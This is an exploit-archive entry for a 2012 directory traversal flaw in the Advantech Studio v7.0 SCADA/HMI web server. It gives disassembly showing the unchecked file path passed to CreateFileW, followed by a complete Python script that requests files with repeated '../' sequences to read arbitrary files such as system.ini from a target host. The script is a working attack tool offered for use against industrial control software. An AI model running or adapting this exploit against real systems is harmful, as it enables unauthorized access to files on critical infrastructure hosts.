1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day # Google Dork: N/A # Date: 2012-12-03 # Exploit Author: Nin3 # Vendor Homepage: http://advantech.com.tw # Version: 7.0 Build Number 0501.1111.0402.0000 # Tested on: Windows # CVE : N/A ''' Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe, the web server is a standalone executable that is used along side every project' to serve as a web based management system with the help of an activex. The flaw occurs because of a lack of any check on the path of the file requested. in function sub_401A90: .text:00402A4A push0 ; dwFlagsAndAttributes .text:00402A4C push3 ; dwCreationDisposition .text:00402A4E push3 ; dwShareMode .text:00402A50 push80000000h ; dwDesiredAccess .text:00402A55 mov edx, [ebp+lpFileName] .text:00402A58 pushedx ; lpFileName .text:00402A59 lea ecx, [ebp+var_1C] .text:00402A5C callsub_401A90 sub_401A90 use CreateFileW function directly. .text:00401A97 push0 ; hTemplateFile .text:00401A99 mov eax, [ebp+dwFlagsAndAttributes] .text:00401A9C pusheax ; dwFlagsAndAttributes .text:00401A9D mov ecx, [ebp+dwCreationDisposition] .text:00401AA0 pushecx ; dwCreationDisposition .text:00401AA1 push0 ; lpSecurityAttributes .text:00401AA3 mov edx, [ebp+dwShareMode] .text:00401AA6 pushedx ; dwShareMode .text:00401AA7 mov eax, [ebp+dwDesiredAccess] .text:00401AAA pusheax ; dwDesiredAccess .text:00401AAB mov ecx, [ebp+lpFileName] .text:00401AAE pushecx ; lpFileName .text:00401AAF callds:CreateFileW ''' import argparse import httplib MAX_NESTED_DIRECTORY = 32 def main(): parser = argparse.ArgumentParser() parser.add_argument('-d') parser.add_argument('-p') parser.add_argument('-f') args = parser.parse_args() if args.d == None or args.p == None or args.f == None: print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini" return httpConn = httplib.HTTPConnection(args.d, int(args.p)) for i in xrange(0, MAX_NESTED_DIRECTORY): temp = MakePath(args.f, i) httpConn.request('GET', temp) resp = httpConn.getresponse() content =resp.read() if resp.status == 404: print 'Not found ' + temp else: print 'Found ' + temp print'------------------------------------------' print content print'---------------------------------------EOF' break def MakePath(f, count): a = "" for i in xrange(0, count): a = a + "../" return a + f if __name__ == "__main__": main() |